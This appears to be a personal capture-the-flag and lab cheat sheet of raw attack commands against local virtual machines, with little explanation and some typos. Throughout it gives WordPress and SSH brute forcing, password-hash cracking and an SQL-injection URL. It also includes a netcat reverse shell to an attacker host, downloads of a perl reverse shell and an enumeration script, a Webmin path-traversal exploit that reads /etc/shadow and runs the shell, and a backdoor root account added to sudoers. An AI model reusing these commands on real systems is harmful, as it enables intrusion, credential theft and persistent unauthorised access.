WORDPRESS 
===========
wpscan -u http://192.168.56.223/bull/

wpscan -u http://192.168.56.223/bull/ -e u

BRUTE FORCE ATTACK
==================
wpscan -u 192.168.56.223/bull/ -U bully -w /root/list.txt

cat kewl.txt | sed -e 's/^./\u&/' >> new.txt
cat kewl.txt | sed -e 's/.$/\u&/' >> new.txt
cat kewl.txt | tr '[:lower:]' '[:upper:]' >> new.txt
cat kewl.txt | tr '[:upper:]' '[:lower:]' >> new.txt
cat kewl.txt | tr 'a-z A-Z' 'A-Z a-z' >> new.txt
cat new.txt | sort | uniq > new1.txt

wpscan -u 192.168.56.223/bull/ -U bully -w /root/new1.txt

cat new1.txt | sed -e 's/a/4/g' -e 's/A/4/g' >> new-leet.txt
cat new1.txt | sed -e 's/e/3/g' -e 's/E/3/g' >> new-leet.txt
cat new1.txt | sed -e 's/l/1/g' -e 's/L/1/g' >> new-leet.txt
cat new1.txt | sed -e 's/o/0/g' -e 's/O/0/g' >> new-leet.txt
cat new1.txt | sed -e 's/t/7/g' -e 's/T/7/g' >> new-leet.txt
cat new1.txt | sed -e 's/a/4/g' -e 's/A/4/g' -e 's/e/3/g' -e 's/E/3/g' -e 's/l/1/g' -e 's/L/1/g' -e 's/o/0/g' -e /O/0/g' -e 's/t/7/g' -e 's/T/7/g'
cat new-leet.txt | sort | uniq > new.txt

wpscan -u 192.168.56.223/bull/ -U bully -w /root/new1.txt


USING RULESETS
===============
hashcat -r /usr/share/hashcat/rules/T0XlC.rule kewl.txt --stdout > t0xic.txt
wc -l t0xic.txt

cat t0xic.txt | sort | uniq > big.txt


GAINING ACCESS
================
python -c 'import pty; pty.spawn("/bin/bash")'


FLAGS
=====

cat shadow.bak | egrep 'minotaur|heffer|h0rnbag|root' | cut -d : -f 2 > hashes.txt
hashcat -a 0 -m 1800 hashes.txt -r /usr/share/hashcat/rules/best64.rule lists/password.lst 

--> enter retrieved password when promted

cd /home/minotaur
ls -lah 
cat flag.txt

cat /root/flag.txt


r00t
====

overlayfs exploit;
https://www.kernel-exploits.com/

sudo -ll

sudo su

cd /root
cat flag.txt
Final flag: 5urr0und3d bY @r$3h0l35

It is mentioned that the users for which passwords were found were able to run
/root/bullquote.sh as root.

arp-scan 192.168.56.0/24

nmap -p- 192.168.56.102

nc 192.168.56.102 25

echo "----" | xxd -r -ps

nikto -h 192.168.56.102

curl 192.168.56.102/robots.txt

wfuzz -c -w /usr/share/seclists/Discovery/Web_Content/common.txt --hc 404 192.168.56.102/FUZZ

wfuzz -c -w /usr/share/seclists/Discovery/Web_Content/common.txt -R 3 --sc 200 192.168.56.102/FUZZ

http://d0not5topme.ctf/ucp.php?sid=0ea605a35c24e11610ecc7ee1aebe621&i=%27%20or%20%271=%271) 
we get a response mentioning an email address for Megusta; Megusta@g4m35.ctf

curl -s --header "Host: test.ctf" 192.168.1.144
for i in $(cat leet.txt);do echo -ne "$i -- " && curl -s --header "Host: $i.ctf" 192.168.1.144 | wc -c ; done

curl -s --header "Host: M36u574.ctf" 192.168.1.144 | wc -c
for i in $(ls *.raw); do echo ; exiftool $i ; done
for i in $(ls *.raw) ; do echo $i; hd $i | tail -n10; done

exiftool -comment kingmegusta.raw | sed 's/^.*: //' | base64 -d

hashcat64.exe -m 1800 -a 0 -w 1 hash.txt rockyou,.txt

ssh MeGustaKing@192.168.56.102

hydra -l burtieo -P lists/rockyou.txt -e nsr 192.168.56.102 ssh

ssh burtieo@192.168.56.102
ssh burtieo@192.168.56.102 cat /etc/passwd
ssh burtieo@192.168.56.102 nc 192.168.56.101 4444 -e /bin/sh

enter burtieo's password
python -c 'import pty; pty.spawn("/bin/sh")'
export TERM=linux

cd /tmp 
which wget 
wget -q 192.168.56.101/linEnum.sh
bash linEnum.sh > enum.txt
nmap -p 10000 -sV 192.168.56.102

import requests
payload = '/..%01' * 10
payload += '/etc/shadow'
r = requests.get('https://192.168.56.102:10000/unauthenticated{}'.format(payload), verify=False)
print r.url, r.status_code, r.reason, r.content
hashcat64.exe -m 1800 -a 0 -w 1 hash.txt rockyou.txt

cd /tmp
wget -q 192.168.56.101/perl-reverse-shell.pl
mv perl-reverse-shell.pl revshell.cgi
chmod +x revshell.cgi

import requests
payload = '/..%01' * 4
payload += '/tmp/revshell.cgi'
r = requests.get('https://192.168.56.102:10000/unauthenticated{}'.format(payload), verify=False)
print r.url, r.status_code

useradd -u 12345 -g root -s /bin/bash -p $(echo epat | openssl  passwd -1 -stdin) tape
echo "tape ALL=(ALL:ALL) NOPASSWD:ALL" >> /etc/sudoers

ssh tape@192.168.56.102 
sudo su

wpscan -url <target> -enumerate u
wpscan -url <target> -wordlist /usr/share/wordlists/rockyou.txt -username admin -threads 2
 
use exploit/unix/webapp/wp_revslider_upload_execute
set rhost 127.0.0.1/<target>
set payload php/meterpreter/bind_tcp

--enumerate|-e[option(s)]Enumeration arguments
option:
u-username from id 1to10
u[10-20]usernames from id 10 to 20
p-plugins
vp-only vuln plugin
ap-all plugin
tt-timthumb
t-themes
vt-only vuln theme
at-all themes
multiple value all allowed :"-ett,p"

"<target> -/wordpress/wp-content/plugins/revslider/temp/upload""127.0.0.1 
